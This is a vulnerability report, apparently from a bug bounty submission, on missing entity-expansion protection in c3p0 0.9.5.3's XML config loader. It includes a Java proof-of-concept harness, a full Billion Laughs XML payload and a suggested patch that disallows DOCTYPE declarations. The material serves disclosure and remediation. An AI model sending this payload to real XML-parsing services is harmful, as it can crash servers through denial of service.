> NOTE! Thanks for submitting a report! Please replace all the [square] sections below with the pertinent details. Remember, the more detail you provide, the easier it is for us to triage and respond quickly, so be sure to take your time filling out the report! Please refer to the example on our policy page.
groupId: com.mchangeartifactId:c3p0version: 0.9.5.3
> c3p0/src/java/com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java
does not protect against recursive entity expansion when loading configuration.
Source File and Line Number: https://github.com/swaldman/c3p0/blob/c3p0-0.9.5.3/src/java/com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java#L154
> Detailed steps to reproduce with all required references/steps/commands. Any sample/exploit code or other proof of concept.
C3P0ConfigXmlUtils.extractXmlConfigFromInputStream()
on Billion Laughs XML payloadimport com.mchange.v2.c3p0.cfg.C3P0ConfigXmlUtils;
import java.io.InputStream;
public class C3P0PoC {
public static void main(String[] args) throws Exception {
String payload = args[0];
InputStream inputStream = C3P0PoC.class.getResourceAsStream(payload);
C3P0ConfigXmlUtils.extractXmlConfigFromInputStream(inputStream, false);
System.out.println("Completed!");
}
}
XML Payload
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
The patch given was adapted from https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.md#jaxp-documentbuilderfactory-saxparserfactory-and-dom4j
Apply the following before calling fact.newDocumentBuilder()
.
String FEATURE = null;
FEATURE = "http://apache.org/xml/features/disallow-doctype-decl";
fact.setFeature(FEATURE, true);
> State all technical information about the stack where the vulnerability was found
> Select Y or N for the following statements:
> Finder’s comments and funny memes goes here
Honestly, this is a pretty complicated attack to pull off. The attack requires poisoned XML configuration data to make to the component’s client code. I may have held off on reporting it, but the maintainer did acknowledge a similar attack, twas XXE, under CVE-2018-20433. Since the reporter didn’t dispute it, I decided to report this attack as valid as well.
Vulnerabilities like these exist because https://docs.oracle.com/javase/7/docs/api/javax/xml/parsers/DocumentBuilderFactory.html#setExpandEntityReferences(boolean) is a poorly named and documented method thus causing misunderstanding.
I’m on my third five hour energy today.
This could be leveraged by an attacker to cause a Denial of Service by crashing the JVM that the server process is running on.